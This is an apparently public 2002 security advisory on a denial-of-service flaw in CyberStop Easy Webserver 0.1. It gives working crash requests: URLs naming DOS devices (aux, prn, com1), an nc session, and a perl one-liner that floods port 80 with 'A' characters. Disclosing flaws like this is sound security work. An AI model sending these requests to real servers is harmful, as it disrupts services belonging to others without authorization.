|
Title
|
CyberStop Web Server Remote DoS
|
|
ID
|
SYBSEC-ADV09
|
|
Severity
|
LOW - Denial of Service
|
|
History
|
15.JAN.2002 Vulnerability discovered
22.JAN.2002 Vendor contacted
|
|
Scope
|
Application Denial of Service
|
|
Platforms
|
Any win32 platforms
|
|
Author
|
|
|
URL
|
http://www.sybsecurity.com/advisors/SYBSEC-ADV09-CyberStop_Web_Server_Remote_DoS
|
|
Release
|
Public
|
|
Overview
|
CyberStop web server can transform a normal PC into a web server.
|
|
Affected versions
|
The vulnerability has been reported in versions WEB Server
Cyberstop: Cyberstop Easy Webserver 0.1
|
|
Description
|
By embedding a DOS device in the URL, remote attackers can cause a denial of service
attacks against the server.
|
|
Workaround
|
|
|
Acknowledgments
|
|
|
References
|
|
|
Details
|
DoS exploit 1:
A Denial of Service attack can be caused in the product by issuing the following request:
http://www.example.com/aux
http://www.example.com/prn
http://www.example.com/com1
sh-2.04# nc -vvn 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (?) open
GET /aux HTTP/1.0
In addition, it is possible to crash the server remotely by sending a large number of 'A' characters to the web server's port.
Exploit:
$ perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 80
|
|
Exploit tool
|
|
Buscar
